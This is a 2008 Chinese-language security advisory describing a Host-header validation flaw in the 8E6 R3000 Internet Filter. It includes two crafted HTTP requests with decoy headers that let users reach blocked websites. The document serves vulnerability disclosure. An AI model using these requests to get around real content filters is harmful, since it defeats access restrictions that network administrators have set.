发布日期：2008-08-05
更新日期：2008-08-06

受影响系统：

8E6 Technologies R3000 Internet Filter 2.0.12.10

描述：

---

BUGTRAQ  ID: 30541

8e6科技的R3000上网行为管理系统是软硬件集成的系统，允许管理者能有效控制与管理互联网用户的上网行为。

R3000 Internet过滤器所提供的HTTP URL过滤功能没有正确的验证Host头，用户可以访问设备设置了访问限制的网站。但用户无法利用这个漏洞绕过基于IP地址的过滤限制。

<*来源：nnposter （nnposter@disclosed.not）
  
  链接：http://marc.info/?l=bugtraq&m=121794822018119&w=2
        http://secunia.com/advisories/31391/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET / HTTP/1.0
  X-DecoyHost: www.allowed.org
  Host: www.blocked.org

  GET / HTTP/1.0
  X-Decoy: Host: www.allowed.org
  Host: www.blocked.org

建议：

---

厂商补丁：

8E6 Technologies
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.8e6.com.cn/index.htm

浏览次数：2661
严重程度：0（网友投票）